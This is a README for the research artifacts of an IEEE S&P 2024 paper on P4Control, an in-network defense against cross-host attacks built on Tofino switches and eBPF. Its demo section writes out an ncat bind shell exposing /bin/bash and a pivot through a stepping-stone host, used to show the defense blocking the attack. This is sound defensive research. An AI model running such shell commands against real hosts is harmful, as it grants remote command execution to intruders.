This repository contains the artifacts for the paper titled "P4Control: Line-Rate Cross-Host Attack Prevention via In-Network Information Flow Control Enabled by Programmable Switches and eBPF", accepted at 45th IEEE Symposium on Security and Privacy (IEEE S&P / Oakland), 2024. For questions, please reach out to Osama Bajaber.
- Python 3.7
- Tofino Switch SDE 9.7.0
- BCC (Linux 5.15.0)
- Bison 3.8.2
- Flex 2.6.4
- Scapy 2.4.5
Current settings assume three hosts are linked to the Tofino switch, each assigned with the following IP addresses and labels. (feel free to adjust these settings as per your topology)
Host1, 10.0.0.1, Label={HOST1}Host2, 10.0.0.2, Label={HOST2}Host3, 10.0.0.3, Label={HOST3}
Ensure that the Tofino switch SDE is installed and set the environment variables SDE=~/bf-sde-9.7.0/ and SDE_INSTALL=~/bf-sde-9.7.0/install. Note: The p4_build.sh and run_switchd.sh scripts can be found within your SDE directory /bf-sde-9.7.0/.
Step 1: Build the P4 program
./p4_build.sh -p switch/p4control.p4
Step 2: Run the switch program in the Tofino switch
./run_switchd.sh -p p4control
Step 3: Start the control plane
python3 switch/controller.py
This will load P4Control in the designated Tofino switch and run the control plane. The current control plane code inserts the needed NetCL policies to block traffic between Host1 and Host3.
Now, as the switch program is running, load the eBPF host agent to the hosts. We tested the host agent on Ubuntu 20.04.1 LTS, but it should work with other versions. Make sure to update the correct interface name in host_agent/host_agent.py.
Step 0: host_agent/host_agent_ebpf.c provides the ability to manually label a specific PID with a custom DIFC label for easy configuration
In your opened terminal, check the PID of the current bash process by executing the following
ps
Copy the PID of the bash process to the defined TAGGED_TERMINAL variable at the top of host_agent/host_agent_ebpf.c
u32 TAGGED_TERMINAL = <PID>;
Step 1: Run the host agent in all three hosts. The following command will attach all the needed eBPF programs inside the kernel
python3 host_agent/host_agent.py
To perform a cross-host attack from Host1 to Host3, using Host2 as a stepping stone
Step 1: In Host2 and Host3, start a ncat listener
sudo ncat -nlvp 9999 -e /bin/bash
Step 2: From Host1, connect to Host2
sudo ncat 10.0.0.2 9999
Step 3: From Host1 establish a session to Host3 through Host2
ncat 10.0.0.3 9999
P4Control will block the last connection as the label {Host1} is detected.
To compile NetCL rules
Step 1: Run the following command
./netcl-compile -i <netcl_rules> -o <compiled_rules>
Step 2: To add the compiled rules to the switch, copy the content of <compiled_rules> to switch/netcl.py and re-run the control plane script
python3 switch/controller.py
We provide custom Scapy tools to send and receive customized packets with DIFC headers. These tools can be used to generate synthetic traffic to test the switch configurations
Step 1: At the receiving host, run the following to start sniffing packets
python3 custom-receive.py
Step 2: At the sending host, run the following command to send the custom packet
python3 custom-send.py <destination_IP> <label> <tracker> <message>
If you like or use our work, please cite us using:
@inproceedings{bajaber2024p4control,
title={P4Control: Line-Rate Cross-Host Attack Prevention via In-Network Information Flow Control Enabled by Programmable Switches and eBPF},
author={Bajaber, Osama and Ji, Bo and Gao, Peng},
booktitle={IEEE Symposium on Security and Privacy (SP)},
year={2024},
}